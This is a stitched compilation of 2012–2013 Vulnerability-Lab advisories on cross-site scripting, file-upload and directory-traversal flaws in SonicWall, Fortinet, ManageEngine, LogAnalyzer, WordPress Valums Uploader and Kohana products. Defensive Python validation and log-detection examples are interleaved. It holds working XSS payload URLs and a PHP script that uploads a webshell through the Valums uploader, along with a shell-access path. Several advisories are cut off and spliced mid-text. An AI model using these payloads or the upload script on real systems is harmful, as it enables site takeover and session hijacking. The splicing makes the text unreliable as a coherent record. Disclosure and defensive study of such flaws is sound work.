The Vulnerability Lab Research Team discovered multiple vulnerabilities in SonicWall's Continuous Data Protection v6.x 5040 appliance application.
Report-Timeline:
================
2012-05-04: Researcher Notification Coordination
2012-05-08: Vendor Notification 1
2012-08-10: Vendor Notification 2
2012-08-16: Vendor Response/Feedback
2012-11-01: Vendor Fix/Patch by Check
2012-11-19: Public Disclosure

Status:
=======
Published

Affected Products:
==================
SonicWall
Product: Continuous Data Protection GUI v5040 6.0.x

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in SonicWall's Continuous Data Protection v6.x 5040 appliance application. The vulnerability allows a remote attacker or a local low privileged user account to inject/implement malicious persistent script code on the application side of the appliance application. The vulnerabilities are located in the network, accounts management and system settings modules with the bound vulnerable label delAppl (name, username, servername) parameters. An attacker can inject script code as name, username or servername via the add function to manipulate the vulnerable module with malicious persistent web context. The persistent script code will be executed when the victim views the vulnerable module listing (output|index). Successful exploitation of the vulnerability results in session hijacking (customer/manager/admin) or stable (persistent) module context manipulation. Exploitation requires low user interaction and a low privileged web application user account.

Vulnerable Module(s):
    [+] Network Settings [Name]
    [+] BMR Accounts [Username]
    [+] System Settings [Server]

Vulnerable Parameter(s):
    [+] label delAppl - Name
    [+] label delAppl - Username
    [+] label delAppl - Servername

Proof of Concept:
=================
The persistent input validation vulnerabilities can be exploited by remote attackers with local low privileged user accounts and low required user interaction.
For demonstration or reproduce ...
Review: Network Settings ADD [Name] - label delAppl - Name

label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/td
td class=tableLineContrast name=ipspanlabel for=delAppl_0 192.168.150.216/label/span/td
td class=tableLineContrast name=netmaskspanlabel for=delAppl_0 255.255.255.0/label/span/td
td class=tableLineContrast name=gatewayspanlabel for=delAppl_0 192.168.150.1/label/span/td
td class=tableLineContrast nowrap=a class=swlEventEdit href=# title=Edit Entryimg class=actionIcon width=20 height=20 border=0 alt=Edit this entry src=images/edit.gif//a/td
td input type=hidden name=itemId value=undefined/input/td/tr/tbody/table/iframe/label

Review: BMR Accounts [Username] - label delAppl - Username

label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/td
td class=tableLineContrast spanlabel for=delAppl_0
ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities
Title:
======
ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities

Date:
=====
2012-11-15

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=689

VL-ID:
=====
689

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
ServiceDesk Plus integrates your help desk requests and assets to help you manage your IT effectively. It helps you implement ITIL best practices and troubleshoot IT service requests faster. ServiceDesk Plus is a highly customizable, easy-to-implement help desk software. More than 10,000 IT managers worldwide use ServiceDesk Plus to manage their IT help desk and assets. ServiceDesk Plus is available in 23 different languages.

(Copy of the Vendor Homepage: http://www.manageengine.com/products/service-desk/)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in ManageEngine's ServiceDesk v8.0 Plus.

Report-Timeline:
================
2012-11-15: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in ManageEngine's ServiceDesk v8.0 Plus web application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Two vulnerabilities are located in the my details and request new incidents module of the web front-end with the bound vulnerable name, subject and description parameters. Exploitation requires low user interaction and a low privileged customer web application user account. The second part of the bugs is located in the New Contract, Access points and Create Solution module of the admin/moderator back-end with the bound vulnerable title, asset name, contract name, description or support name. Successful exploitation of the vulnerability can lead to session hijacking (customer/manager/admin), persistent phishing or stable (persistent) web context manipulation.
Vulnerable Module(s): Customer/User/Moderator Front-End
    [+] My Details - [Name]
    [+] Requests - New Incident - [Subject] - [Description]

Vulnerable Module(s): Admin/Moderator Back-End
    [+] Solution - Create Solution - [Title]
    [+] Assets - It Assets - Access points - [Asset name]
    [+] Contract - New Contract - [Contract Name] - [Description] - [name] - [Support]

Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by remote attackers with low required user interaction and a low privileged user account.
For demonstration or reproduce ...

The vulnerability in the Requester account can be exploited by many different methods. The first attack vector can be launched by creating a request and injecting malicious code in the subject and description fields of the request. When the victim views the requests and hovers the mouse cursor over the request name, the code gets executed in the small pop-up window that contains the Subject and Description information of the request.

Another way to attack the admin is to edit the details of the requester account and inject the malicious code in the field Name. After that, the attacker creates a request. Once the admin views the requests, the code gets executed in the field of the requester name.

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
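Both the SonicWALL CDP advisory (name, username and servername written through the add function and rendered into a label listing) and the ServiceDesk advisory (name, subject, title and similar fields rendered into lists and pop-ups) are the same class of bug: a value is accepted on input without an allowlist and rendered later without output encoding. The Python example below, which is added here and belongs to neither product, shows the two layers a defender wants: input-side allowlist rules for the three identifier types the CDP advisory names, and a renderer that escapes every stored value at output time so that a record which slipped past validation earlier still cannot inject markup. The regular expressions, the record layout and the sample records are constructed; the label/td markup mirrors the structure in the CDP code review.

```python
import html
import re

# Allowlist rules for the three field kinds named in the SonicWALL CDP and
# ServiceDesk advisories. Constructed examples of what such rules can look
# like; the products' actual rules are not on the page.
USERNAME_RE = re.compile(r"[a-z][a-z0-9._-]{0,31}")
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 .,'()\-]{0,63}")
HOST_LABEL_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def valid_username(v: str) -> bool:
    return USERNAME_RE.fullmatch(v) is not None


def valid_display_name(v: str) -> bool:
    return DISPLAY_NAME_RE.fullmatch(v) is not None


def valid_servername(v: str) -> bool:
    """Hostname: 1..253 chars, dot-separated labels, no leading/trailing hyphen."""
    if not 1 <= len(v) <= 253:
        return False
    return all(HOST_LABEL_RE.fullmatch(label) for label in v.rstrip(".").split("."))


FIELD_RULES = {
    "name": valid_display_name,
    "username": valid_username,
    "servername": valid_servername,
}


def rejected_fields(record: dict) -> list:
    """Input-side check: names of the fields that fail their allowlist."""
    return [f for f, check in FIELD_RULES.items()
            if f in record and not check(record[f])]


def render_listing(records: list) -> str:
    """Output-side defence: every stored value is HTML-escaped at render time,
    regardless of whether it was validated when it was written. The markup
    mirrors the label/td structure shown in the CDP code review."""
    rows = []
    for i, rec in enumerate(records):
        cells = "".join(
            f'<td class="tableLineContrast"><span><label for="delAppl_{i}">'
            f'{html.escape(str(rec.get(field, "")), quote=True)}'
            f"</label></span></td>"
            for field in FIELD_RULES
        )
        rows.append(f"<tr>{cells}</tr>")
    return "<table><tbody>" + "".join(rows) + "</tbody></table>"


# Constructed records: one clean, one carrying a stored value shaped like the
# advisory's "[PERSISTENT SCRIPT CODE!]" placeholder plus a malformed hostname.
SAMPLE_RECORDS = [
    {"name": "Backup Server 1", "username": "bkp.user",
     "servername": "cdp01.example.internal"},
    {"name": "<iframe src=a>", "username": "x", "servername": "srv-.bad"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec, "->", rejected_fields(rec) or "ok")
    print(render_listing(SAMPLE_RECORDS))
```

The renderer escapes with `quote=True` because the values end up inside attribute values as well as element text in listings like the ones reviewed above; escaping only `<` and `>` would leave the attribute context open.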
FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability
/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

Solution:
=========
The vulnerability can be prevented by parsing the Java number format exception output that lists the mkey application value.

2012-10-24: Vendor Fix/Patch

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (rem...@vulnerability-lab.com)
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities
Title:
======
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities

Date:
=====
2012-12-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=702

VL-ID:
=====
702

Common Vulnerability Scoring System:
====================================
2.1

Introduction:
=============
FortiWeb web application firewalls protect, balance, and accelerate your web applications, databases, and any information exchanged between them. Whether you are protecting applications delivered over a large enterprise, service provider, or cloud-based provider network, FortiWeb appliances will reduce deployment time and simplify security management. Fortinet's FortiWeb™ has passed ICSA Web Application Firewall Certification. The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are evidence of FortiWeb's commitment to uphold the industry's highest security standards. Achieving this certification ensures that FortiWeb™ customers benefit from best practices in the security industry for all their Web application needs.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in Fortinet's FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance.

Report-Timeline:
================
2012-10-01: Researcher Notification Coordination
2012-10-11: Vendor Notification
2012-10-05: Vendor Response/Feedback
2012-11-11: Vendor Fix/Patch
2012-12-01: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Fortinet
Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A non-persistent cross site scripting vulnerability is detected in Fortinet's FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with low or medium required user interaction and without a local privileged application user account.
The vulnerability is located in the Regular Expression - Validation (pcre_expression/validate) module with the bound vulnerable redir and mkey parameters. Successful exploitation results in client-side account theft, client-side phishing and client-side appliance module context request manipulation.

Vulnerable Module(s):
    [+] Regular Expression - Validation Module (pcre_expression/validate)

Vulnerable Parameter(s):
    [+] redir
    [+] mkey

Proof of Concept:
=================
The client side cross site scripting vulnerability can be exploited by remote attackers without an application user account and with medium required user interaction.
For demonstration or reproduce ...

Code Review: Regular Expression - Validation Module (mkey redir)

trtd
table class=footer cellpadding=0 cellspacing=0
trtd
input class=button type=button value=Return onclick=if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'}
/td/tr
/table
/td/tr
input type=hidden name=mkey size=22 maxlength=22 value=0[CLIENT SIDE SCRIPT CODE EXECUTION!])
input type=hidden name=validated value=-1
input type=hidden name=redir value=/success
/form
/table
/td
...
PoC:
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/successmkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3Cmkey=0

Solution:
=========
The vulnerability can be patched by parsing all mkey and redir success parameter requests of the vulnerable Regular Expression - Validation module.

2012-11-11: Vendor Fix/Patch

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
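The FortiDB and FortiWeb advisories describe the same root cause from two angles: a parameter that is supposed to be a number (mkey, or the value the Java number format exception reports) or a local path (redir) is echoed back into a hidden input of the response without being parsed first. The example below, added here and written in Python rather than the appliances' Java/JSF code, shows what "parsing the parameter" means in practice: mkey is accepted only as a bounded decimal integer and is never echoed when it fails, redir is accepted only as a same-site absolute path and otherwise replaced by the default target, and whatever is emitted into the hidden fields is attribute-escaped. The 22-digit bound is taken from `size=22 maxlength=22` in the code review above; the default target `/success` comes from the PoC URLs; the `validated=-1` marker for a rejected mkey is an assumed use of the field shown in the review, not documented behaviour.

```python
import html
import re


class ParamError(ValueError):
    """Raised for a parameter that fails validation; carries no user input."""


# mkey is shown as a 22-character numeric field (size=22 maxlength=22) in the
# code review above, so it is validated as a bounded decimal integer.
MKEY_RE = re.compile(r"[0-9]{1,22}")

# redir must be a same-site absolute path. ':' and '%' are deliberately not
# allowed, so scheme-relative ('//host'), absolute-URL and percent-encoded
# forms all fall back to the default target; '..' segments are refused too.
PATH_RE = re.compile(r"/(?!/)[A-Za-z0-9_./-]*")
DEFAULT_REDIR = "/success"   # the value seen in the advisory's PoC URLs


def parse_mkey(raw: str) -> int:
    if MKEY_RE.fullmatch(raw) is None:
        raise ParamError("mkey must be a decimal integer of at most 22 digits")
    return int(raw)


def mkey_is_valid(raw: str) -> bool:
    try:
        parse_mkey(raw)
        return True
    except ParamError:
        return False


def safe_redirect_target(raw: str) -> str:
    if raw and PATH_RE.fullmatch(raw) and ".." not in raw:
        return raw
    return DEFAULT_REDIR


def render_hidden_fields(mkey_raw: str, redir_raw: str) -> str:
    """Build the hidden inputs of the validate page with hardened handling:
    an invalid mkey is not echoed at all (a fixed marker is emitted instead,
    an assumed use of the 'validated' field), and every attribute value is
    escaped for attribute context."""
    fields = []
    if mkey_is_valid(mkey_raw):
        fields.append(("mkey", str(parse_mkey(mkey_raw))))
    else:
        fields.append(("validated", "-1"))
    fields.append(("redir", safe_redirect_target(redir_raw)))
    return "".join(
        f'<input type="hidden" name="{name}" value="{html.escape(value, quote=True)}">'
        for name, value in fields
    )


if __name__ == "__main__":
    # Constructed inputs in the shape of the PoC: a non-numeric mkey and a
    # redir value carrying encoded markup.
    print(render_hidden_fields('0"><iframe src=a>', "/success%20%22%3E%3Ciframe"))
```

Note the asymmetry in the two checks: mkey is typed (it either parses as an integer or the request is answered with a generic error), while redir is treated as a location and is replaced rather than rejected, which also closes the open-redirect variant of the same parameter.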
Enterpriser16 LoadBalancer v7.1 - Multiple Web Vulnerabilities
failed the validation.
br ' iframe [PERSISTENT INJECTED SCRIPT CODE!] ' is not a valid IP address. /em /p

URL: http://loadbalancer.127.0.0.1:8080/lbadmin/config/physicaladv.php?mnp=editsubmnp=epat=1355527441l=e

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability
Title:
======
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability

Date:
=====
2012-12-20

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=792

Vendor: http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater

VL-ID:
=====
792

Common Vulnerability Scoring System:
====================================
1.5

Introduction:
=============
LogAnalyzer is part of Adiscon's MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).

(Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ )

Abstract:
=========
An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the Log Analyzer v3.6.0 web application.

Report-Timeline:
================
2012-12-20: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A client side cross-site scripting vulnerability is detected in the LogAnalyzer 3.6.0 web application. The vulnerability allows a remote attacker with high required user interaction to force client side XSS requests. The vulnerability is located in the asktheoracle.php file with the bound vulnerable oracle_query parameter request. An attacker can force client side requests to execute arbitrary script code by using the oracle_query parameter. Successful exploitation of the vulnerability results in client side execution of the injected script, client side phishing, client side module context manipulation and evil unauthorized external redirects.
Vulnerable File(s):
    [+] asktheoracle.php

Vulnerable Parameter(s):
    [+] oracle_query

Proof of Concept:
=================
The client side cross site scripting vulnerability can be exploited by remote attackers with medium or high required user interaction and without a privileged application user account.

http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstroracle_query=[CLIENT SIDE SCRIPT CODE!]

Note: The 'oracle_query' parameter is not sanitized properly on the asktheoracle.php page.

Solution:
=========
Upgrade to the latest version of Log Analyzer 3.6.1

Risk:
=====
The security risk of the client side cross site scripting web vulnerability is estimated as low(+)

Credits:
========
Mohd Izhar Ali - [http://johncrackernet.blogspot.com]
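The FortiDB, FortiWeb and Log Analyzer findings are all reflected, GET-based cross site scripting, and the PoC URLs show the shape such requests take in a web server's access log: a query parameter whose percent-decoded value begins a tag or an event handler. The following Python script, added here as a detection example and not taken from any of the products or advisories, parses Combined Log Format lines, decodes each query value (repeatedly, so a double-encoded value is caught as well) and reports parameters that carry markup indicators. The log lines are constructed (RFC 5737 addresses); two of them carry the payload shape of the PoC URLs on this page, the paths are the ones the advisories name, and the indicator patterns are triage heuristics rather than a complete grammar.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined/Common Log Format: ip ident user [ts] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Markup and script indicators in a decoded query value. Constructed
# heuristics for triage, not a complete XSS grammar.
SUSPECT_RE = re.compile(
    r"<\s*/?\s*(iframe|script|img|svg|object|embed|body|a)\b"   # tag start
    r"|\bon[a-z]+\s*="                                           # event handler
    r"|javascript\s*:",                                          # js: URL
    re.I,
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (parse_qsl already did one round)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return None for an unparsable line, else the list of suspect parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        found = SUSPECT_RE.search(fully_decode(value))
        if found:
            hits.append({"ip": m.group("ip"), "path": target.path,
                         "param": name, "indicator": found.group(0)})
    return hits


def scan_log(lines) -> list:
    return [hit for line in lines for hit in (scan_line(line) or [])]


# Constructed sample log. Lines 2 and 4 carry payloads shaped like the PoC
# URLs on this page; line 4 is double-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2012:10:00:01 +0000] "GET /loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=failed+login HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [20/Dec/2012:10:00:05 +0000] "GET /fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Dec/2012:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [20/Dec/2012:10:00:12 +0000] "GET /loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 3980 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Dec/2012:10:00:20 +0000] "GET /search?q=logon+failure+on+node2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fifth line is there on purpose: `logon` and `on node2` contain the letters of an event handler but not the `on<name>=` shape, so a word-boundary-aware pattern keeps them out of the alerts.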
SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability
Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Wordpress Valums Uploader - File Upload Vulnerability
Title:
======
Wordpress Valums Uploader - File Upload Vulnerability

Date:
=====
2013-01-04

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=817

VL-ID:
=====
817

Common Vulnerability Scoring System:
====================================
7.5

Abstract:
=========
The independent laboratory researcher (jingo-bd) discovered a remote file upload vulnerability in the Wordpress `Valums Uploader` application.

Report-Timeline:
================
2013-01-04: Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A file upload vulnerability is detected in the Wordpress `Valums Uploader` application module. The vulnerability allows remote attackers to upload files such as webshells and then access them without authorization after the upload to compromise the application system. The vulnerability is located in the valums uploader module when processing upload requests via POST. Attackers can upload their own files without authorization to compromise the web application or the system DBMS. Exploitation of the file upload vulnerability requires no user interaction and can be processed without a privileged application user account. Successful exploitation of the remote file upload vulnerability results in system and DBMS compromise.

Vulnerable Module(s):
    [+] Valums Uploader

Proof of Concept:
=================
The remote vulnerability can be exploited by remote attackers without required user interaction and without a privileged application user account.
For demonstration or reproduce ...

<?php
$uploadfile = "bangla.php";
$ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php Reference(s): http://www.xxx.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php http://www.xxx.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php http://www3.xxx.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps Risk: = The security risk of the unauthorized shell upload exploit is estimated as high(+). Credits: JingoBD - (http://facebook.com/bdcyberarmy) Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends and BANGLADESHI Hacker Team. Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. 
nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities
[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D]

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]

1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and by local privileged application user accounts with low user interaction. For demonstration or reproduce ...

PoC:
[VALID IP]%20'+%20[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20[PERSISTENT SCRIPT CODE!]+...

Solution:
=========
Parse the exception-handling error output listing and disallow error echoes of the requested web context. To fix the vulnerability, parse the context of the input fields in the add devices module and restrict the input fields with a secure filter mask. Also parse the name and IP scan index output listing and restrict the input of the requested web context in the scan listing.

2012-01-28: Vendor Fix/Patch by nCircle Dev

Risk:
=====
1.1
The security risk of the client- and server-side POST injection web vulnerability in the exception handling and listing is estimated as medium(+).

1.2
The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities
/FEAdmin.html#SystemBlackWhiteList

Module: Bounce Verification - Username
URL: https://209.87.230.132:1443/admin/FEAdmin.html#AsBounceverifyKeyCollection

<div id="ext-gen7197" class="ext-mb-content"><span id="ext-gen4185" class="ext-mb-text">Invalid user name: <iframe id="ext-gen19608" [PERSISTENT INJECTED SCRIPT CODE!];) = =[PERSISTENT INJECTED SCRIPT CODE!])></iframe></span>

1.2
The persistent vulnerability can be exploited by remote attackers with a privileged application account and low required user interaction. For demonstration or reproduce ...

Module: Upload or Import - Local Certificate - Certificate name
URL: https://209.87.230.132:1443/admin/FEAdmin.html#SysCertificateDetailCollection

<div id="ext-gen38011" class="x-grid3-body">
<div id="ext-gen38041" class="x-grid3-row x-grid3-row-selected" style="width: 1158px;">
<table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td id="ext-gen38095" class="x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first" style="width:248px;" tabindex="0"><div id="ext-gen38036" class="x-grid3-cell-inner x-grid3-col-mkey" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-subject" style="width: 726px;" tabindex="0"><div id="ext-gen38068" class="x-grid3-cell-inner x-grid3-col-subject" unselectable="on">/[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]</div></td>
<td id="ext-gen38085" class="x-grid3-col x-grid3-cell x-grid3-td-status" style="width:148px;" tabindex="0"><div id="ext-gen38086" class="x-grid3-cell-inner x-grid3-col-status" unselectable="on">OK</div></td>
<td id="ext-gen38084" class="x-grid3-col x-grid3-cell x-grid3-td-isReferenced x-grid3-cell-last" style="width:28px;" tabindex="0"><div class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img src="images/gray-ball.png" alt="0" align="absmiddle" border="0"></div></td>
</tr></tbody></table></div>
<div id="ext-gen38040" class="x-grid3-row x-grid3-row-alt" style="width: 1158px;">
<table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first" style="width:248px;" tabindex="0"><div id="ext-gen38037" class="x-grid3-cell-inner x-grid3-col-mkey" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-subject" style="width: 726px;" tabindex="0"><div id="ext-gen38039" class="x-grid3-cell-inner x-grid3-col-subject" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-status" style="width:148px;" tabindex="0"><div id="ext-gen38102" class="x-grid3-cell-inner x-grid3-col-status" unselectable="on">Default</div></td>
<td id="ext-gen38101" class="x-grid3-col x-grid3-cell x-grid3-td-isReferenced x-grid3-cell-last" style="width:28px;" tabindex="0"><div id="ext-gen38083" class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img id="ext-gen38100" src="images/red-ball.png" alt="1" align="absmiddle" border="0"></div></td>
</tr></tbody></table></div>
</div>

Solution:
=========
1.1
The exception-handling vulnerability can be fixed by parsing the full content without excluding what follows a close tag. Restrict the input fields to allowed chars.

1.2
The persistent vulnerability in the certificate import/upload module can be patched by parsing the certificate name and info input fields. Do not forget to also parse the vulnerable output listing of the certificate name and cert information.

Risk:
=====
The security risk of the exception-handling and input filter bypass vulnerability is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Kohana Framework v2.3.3 - Directory Traversal Vulnerability
Title:
======
Kohana Framework v2.3.3 - Directory Traversal Vulnerability

Date:
=====
2013-01-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=841

VL-ID:
======
837

Common Vulnerability Scoring System:
====================================
7.1

Introduction:
=============
Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small. (copy from vendor website)

This is an OOP framework that is extremely DRY. Everything is built using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code profiling, encryption, validation, and more. Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand what is happening. Simple and effective tools help identify and solve performance issues quickly.

(Copy of the Vendor Homepage: http://kohanaframework.org/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System.

Report-Timeline:
================
2013-01-27: Public Disclosure

Status:
=======
Published

Affected Products:
==================
Kohana
Product: Framework - Content Management System 2.3.3

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A Directory Traversal web vulnerability was detected in the Kohana Content Management System web application. The vulnerability allows remote attackers to request local directories and files of the web server application system. The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file, in line 90, where the path directory of the request is processed via a replace. The filter replaces `../` by null and is applied to file reading requests.

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')->uri(array(
    'action' => 'thumb',
    'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
));

